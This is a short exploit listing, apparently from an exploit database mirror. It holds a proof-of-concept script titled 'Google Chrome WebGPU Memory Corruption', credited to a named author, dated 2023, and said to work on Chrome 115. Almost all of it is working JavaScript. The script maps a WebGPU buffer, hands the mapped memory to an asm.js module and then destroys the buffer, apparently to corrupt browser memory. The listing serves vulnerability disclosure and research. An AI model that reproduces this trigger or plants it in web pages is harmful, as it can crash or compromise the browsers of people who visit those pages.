Share
## https://sploitus.com/exploit?id=PACKETSTORM:173722
<script>
/*
Google Chrome WebGPU Memory Corruption
Author: Jean Pereira <pereira.one.010@gmail.com>
Released: 2023/06/25
Vendor: https://www.google.com
Software: https://www.google.com/chrome/
Tested with version: 115.0.5790.102 (latest version)
*/
navigator.gpu.requestAdapter().then(a => {
a.requestDevice().then(d => {
const b = d.createBuffer({
mappedAtCreation: true,
size: 0x1000,
usage: GPUBufferUsage.MAP_WRITE,
})
function asm(s, a, b) {
'use asm'
var arr = new s.Uint32Array(b)
function nop(x) {
x = x | 0
}
return nop
}
asm({
Uint32Array: Uint32Array
}, {}, b.getMappedRange())
b.destroy()
})
})
</script>